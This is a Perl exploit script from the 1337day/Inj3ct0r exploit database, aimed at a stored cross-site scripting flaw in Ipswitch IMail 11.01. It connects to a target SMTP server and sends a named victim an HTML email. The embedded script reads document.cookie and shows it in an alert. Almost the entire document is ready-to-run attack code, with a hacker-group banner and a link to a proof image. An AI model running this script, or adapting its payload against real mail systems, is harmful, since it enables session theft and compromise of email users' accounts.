#!/usr/bin/perl #1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 #0 _ __ __ __ 1 #1 /' \ __ /'__`\ /\ \__ /'__`\ 0 #0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 #1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 #0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 #1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 #0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 #1 \ \____/ >> Exploit database separated by exploit 0 #0 \/___/ type (local, remote, DoS, etc.) 1 #1 1 #0 [+] Site : 1337day.com 0 #1 [+] Support e-mail : submit[at]1337day.com 1 #0 0 #1 ######################################### 1 #0 I'm DaOne member from Inj3ct0r Team 1 #1 ######################################### 0 #0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 # Exploit Title: Ipswitch IMail 11.01 Stored XSS Vulnerability # Date: 26-04-2013 # Author: DaOne aka Mocking Bird # Vendor Homepage: http://www.ipswitch.com/ # Platform: windows use Net::SMTP; # ARGV Check if ($#ARGV != 2) { print "\nUSAGE: IMail.pl <Mail Server> <Attacker Email> <VicTim Email>\n"; exit; } $host = $ARGV[0]; $attacker = $ARGV[1]; $victim = $ARGV[2]; # Config SMTP $smtp = Net::SMTP->new( Host => $host, Hello => 'Hello world', Timeout => 30) or die "Couldn't connect to Mail Server\n"; # Attacker and Victim email $smtp->mail($attacker); $smtp->to($victim); # Send email $buffer = "From: XSS\n". "To: testing\n". "Subject: testing\n". "MIME-Version: 1.0\n". "Content-Type: multipart/mixed;\n". " boundary=\"--=45145578442838848853975045745715171602582966277178406402638054315034128543847104614337851625097187549984363453814450535441019\"\n\n". "----=45145578442838848853975045745715171602582966277178406402638054315034128543847104614337851625097187549984363453814450535441019\n". "Content-Type: text/html;\n". "charset=\"utf-8\"\n". "Content-Transfer-Encoding: quoted-printable\n\n". "XSS\n". "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">\n". "<HTML><BODY>\n". "<script >alert(document.cookie)</script >\n". "</BODY></HTML>\n\n". "----=45145578442838848853975045745715171602582966277178406402638054315034128543847104614337851625097187549984363453814450535441019--"; $smtp->data(); $smtp->datasend($buffer); $smtp->quit(); print "Send.\n"; # Proof http://oi40.tinypic.com/34yw8hz.jpg